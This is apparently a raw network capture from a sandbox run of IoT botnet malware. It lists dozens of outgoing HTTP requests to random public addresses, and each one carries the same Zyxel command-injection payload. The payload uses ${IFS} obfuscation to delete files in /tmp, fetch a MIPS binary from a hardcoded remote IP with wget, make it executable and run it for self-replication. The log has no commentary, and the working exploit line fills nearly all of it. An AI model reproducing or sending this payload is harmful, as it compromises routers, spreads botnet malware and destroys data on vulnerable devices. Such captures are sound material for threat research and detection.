                                        Mar 31, 2024 09:20:48.466254950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2378192.168.2.2354308144.178.88.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466309071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2379192.168.2.2359734208.234.94.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466377974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2380192.168.2.23359704.151.225.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466413975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2381192.168.2.2335742134.82.250.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466455936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2382192.168.2.23376904.89.212.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466485023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2383192.168.2.2350268153.163.155.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466573954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2384192.168.2.234918046.134.118.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466615915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2385192.168.2.2334282131.69.178.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466667891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2386192.168.2.2359728178.190.76.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466706038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2387192.168.2.234303219.132.7.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466779947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2388192.168.2.2337926100.38.226.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466815948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2389192.168.2.23575442.232.19.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466867924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2390192.168.2.2336090113.18.199.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466927052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2391192.168.2.2340272170.239.97.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.466964960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2392192.168.2.233318084.145.178.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467034101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2393192.168.2.2340370151.31.91.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467071056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2394192.168.2.235184417.25.76.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467112064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2395192.168.2.2358302104.20.83.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467171907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2396192.168.2.2338908141.99.122.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467231989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2397192.168.2.2339246163.159.144.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467255116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2398192.168.2.2349650143.201.178.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467297077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2399192.168.2.235009659.52.72.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467343092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2400192.168.2.2341494171.207.71.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467401981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2401192.168.2.234406487.132.207.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467446089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2402192.168.2.2343638100.190.219.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467502117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2403192.168.2.2342214175.247.8.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467566013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2404192.168.2.2355744204.240.61.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467622042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2405192.168.2.2351920131.122.162.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467679977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2406192.168.2.2336824145.24.219.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467737913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2407192.168.2.2333900182.72.192.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467786074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2408192.168.2.2332836154.46.25.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467828035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2409192.168.2.2356554162.38.101.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467888117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2410192.168.2.234544663.65.221.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467924118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2411192.168.2.2358030217.95.190.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.467994928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2412192.168.2.2337764126.85.180.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468045950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2413192.168.2.23418748.79.248.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468115091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2414192.168.2.2340750132.9.251.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468153000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2415192.168.2.235703248.168.11.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468200922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2416192.168.2.2335656187.78.39.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468241930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2417192.168.2.2348758198.45.80.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468291998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2418192.168.2.233657457.106.15.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468323946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2419192.168.2.2335968153.63.142.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468389034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2420192.168.2.235911665.236.47.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468444109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2421192.168.2.2354494212.8.221.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468496084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2422192.168.2.2351994196.172.4.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468547106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2423192.168.2.2334608198.177.102.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468585968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2424192.168.2.233402296.173.68.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468621969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2425192.168.2.2349448189.95.195.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468660116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2426192.168.2.2336842219.137.95.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468692064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2427192.168.2.235639685.60.176.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468758106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2428192.168.2.2347580188.143.31.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468808889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2429192.168.2.2358150164.64.195.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468854904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2430192.168.2.2335330205.61.93.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468904018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2431192.168.2.233672079.129.104.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.468950987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2432192.168.2.2349414196.46.250.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469027042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2433192.168.2.2339076173.81.77.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469075918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2434192.168.2.234259420.94.45.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469131947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2435192.168.2.2346780194.208.98.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469188929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2436192.168.2.2357158197.57.49.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469237089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2437192.168.2.2352574179.203.253.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469289064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2438192.168.2.233506819.160.155.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469331026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2439192.168.2.2347426175.199.143.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469394922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2440192.168.2.2355924204.9.0.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469456911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2441192.168.2.2353430147.56.251.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469499111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2442192.168.2.2335924160.142.110.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469536066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2443192.168.2.2354756107.0.39.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469604015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2444192.168.2.2345138190.117.88.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:48.469633102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2445192.168.2.234332250.109.220.212443
                                        TimestampBytes transferredDirectionData
